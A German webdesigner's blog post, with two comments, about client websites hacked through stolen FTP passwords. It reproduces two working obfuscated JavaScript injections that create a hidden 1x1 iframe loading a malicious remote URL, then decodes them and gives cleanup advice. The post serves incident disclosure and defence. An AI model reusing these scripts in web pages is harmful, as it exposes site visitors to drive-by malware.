Di
17:52
Tag
1719
7855 views

Website gehackt mit Iframe Exploit!

In den letzten Wochen wurden nach 13 Jahren als Webdesigner gleich mehrere meiner Kundenhomepages gehackt. In Ermangelung irgendwelcher ernstzunehmender Treffer und Abhilfe via Google poste ich hier mal die genauen Symptome. Der Hack erfolgt anscheinend mittels eines gestohlenen FTP-Passworts. Die Verbindung kam laut FTP-Log immer von der IP 46.203.98.175 in der Ukraine – vermutlich ein Zombie PC.

Der Angriff dauerte immer wenige Minuten. Die Dateien wurden anscheinend von hand heruntergeladen und mit einem bösen verschlüsselten Javascript versehen wieder hochgeladen. Betroffen sind meistens die Dateien index.html bzw. index.php in Gambio Shops oder auf wp-blog-header.php in WordPress.

Website gehackt mit Iframe Exploit – Hier einige Beispielcodes des eingefügten Javascripts:

<script>var RSx =      '06d06503b06d06506806d06506506d06507106d06506006d06506c06d06506406d06501f06d06507206d06507106d06506206d06503c06d06502106d06502106d06501f06d06507606d06506806d06506306d06507306d06506706d06503c06d06502106d06503006d06502106d06501f06d06506706d06506406d06506806d06506606d06506706d06507306d06503c06d06502106d06503006d06502106d06501f06d06506806d06506306d06503c06d06502106d06504b06d06505606d06506e06d06502106d06501f06d06506506d06507106d06506006d06506c06d06506406d06506106d06506e06d06507106d06506306d06506406d06507106d06503c06d06502106d06502f06d06502106d06503d06d06503b06d06502e06d06506806d06506506d06507106d06506006d06506c06d06506406d06503d';function      Kho(Wg,w1,w2){var Obt='';arr=Wg.split('0'+w1+'0'+w2+'0');for(i=1;     i<arr.length; i++){ Obt+='%'+(parseInt(arr[i],     16)+1).toString(16);}return Obt;} var      zOF=unescape;document.write(zOF(Kho(RSx,'6d','65')));document.getElementById('LWo').src      =      zOF(Kho('03406e06703406e07303406e07303406e06f03406e03903406e02e03406e02e03406e03003406e03303406e03503406e02d03406e03003406e03703406e03403406e02d03406e03103406e03303406e03803406e02d03406e03003406e02f03406e03603406e02e03406e07203406e07503406e02e03406e06203406e06e03406e07403406e06d03406e07303406e02d03406e06f03406e06703406e06f03406e03e03406e06003406e06303406e06303406e03c03406e030','34','6e'));</script>

oder auch

<script>var nhT =      '06106903b06106906806106906506106907106106906006106906c06106906406106901f06106907206106907106106906206106903c06106902106106902106106901f06106907606106906806106906306106907306106906706106903c06106902106106903006106902106106901f06106906706106906406106906806106906606106906706106907306106903c06106902106106903006106902106106901f06106906806106906306106903c06106902106106904806106906706106904b06106902106106901f06106906506106907106106906006106906c06106906406106906106106906e06106907106106906306106906406106907106106903c06106902106106902f06106902106106903d06106903b06106902e06106906806106906506106907106106906006106906c06106906406106903d';function      FB(dmz,w1,w2){var FkG='';arr=dmz.split('0'+w1+'0'+w2+'0');for(i=1;     i<arr.length; i++){ FkG+='%'+(parseInt(arr[i],     16)+1).toString(16);}return FkG;} var      eNQ=unescape;document.write(eNQ(FB(nhT,'61','69')));document.getElementById('IhL').src      =      eNQ(FB('03107306703107307303107307303107306f03107303903107302e03107302e03107303003107303303107303503107302d03107303003107303703107303403107302d03107303103107303303107303803107302d03107303003107302f03107303603107302e03107307203107307503107302e03107306203107306e03107307403107306d03107307303107302d03107306f03107306703107306f03107303e03107306003107306303107306303107303c031073030','31','73'));</script>

Beide Website Hacks mit Iframe Exploit sind vom System her gleich, aber unterschiedlich verschlüsselt, daher so nicht in Google auffindbar. Beide geben entschlüsselt den gleichen HTML/Javascript-Code aus. Der erste Teil ergibt

<iframe src="" width="1" height="1" id="IhL" frameborder="0"></iframe>

Der zweite Teil gibt dem bisher leeren Iframe via Javascript eine src-Angabe hinzu. Diese lautet http://146.185.249.107/sv/count.php?add=1 – Bitte nicht besuchen! Das ist Gift!

Ihr habt einen ähnlichen Website-Hack mit Iframe-Exploit? Als erstes solltet ihr via FTP eure FTP-logfiles checken. Alle Modifikationen betrafen bei meinen Kunden vor allem index.php / index.html Dateien. Der Website-Hack mit Iframe-Exploit erfolgte binnen weniger Minuten, die Dateien wurden anscheinend live mit Hand geändert. Findet alle diese Dateien, säubert sie und setzt danach unbedingt alle Server-Admin und FTP-Passwörter auf neue sichere Werte!

Die eine Frage bleibt: Wie ist der Hacker an die FTP-Passwörter gekommen? Ich hab jetzt viel gelesen, hab mein System mit zahlreichen Scannern untersucht. Alles sauber. Aber irgendwoher muss der Hacker die FTP-Passwörter haben. Kunden-PCs sind angeblich auch sauber. Wessen Website wurde noch auf ähnliche Weise gehackt? Gaben eure Scanner irgendwas aus?

Nach Analyse einer infizierten Site erhalte ich folgenden Hinweis: http://sucuri.net/malware/malware-entry-mwjs160

Website gehackt mit Iframe Exploit…Ende

 



Bewerte diesen Beitrag auf blog.ff-webdesigner.de!

Website gehackt mit Iframe Exploit!: 1 Stern2 Sterne3 Sterne4 Sterne5 Sterne 1,83 von 5 Punkten, basieren auf 6 abgegebenen Stimmen.
Loading...Loading...

2 Kommentare zu “ Website gehackt mit Iframe Exploit! ”

Hiho,

Du hast vermutlich das FTP-Passwort auf Deinem Rechner im FTP-Programm gespeichert, und vermutlich wird das Filezilla oder WinSCP gewesen sein. Waren beide Programme anfällig für das Auslesen des Passworts.

Dann bist Du wohl selbst auf eine Seite mit iframe-exploit gekommen, da hats Dir dann die FTP-Passwörter Daten ausgelesen und an alle index-Dateien das javascript angefügt (automatisch, nicht von Hand….).

Ist mir auch passiert =). FTP-Passwörter ändern nicht vergessen!

Grüssle!

Kommentar von coa am 20.6.2012

Hey,
der zitierte Code lässt mein Avast! Alarm schlagen!
Vielleicht besser als Bild einbinden ;-)

Kommentar von Pascal am 28.11.2013

Du hast was zu sagen? Dann schreib!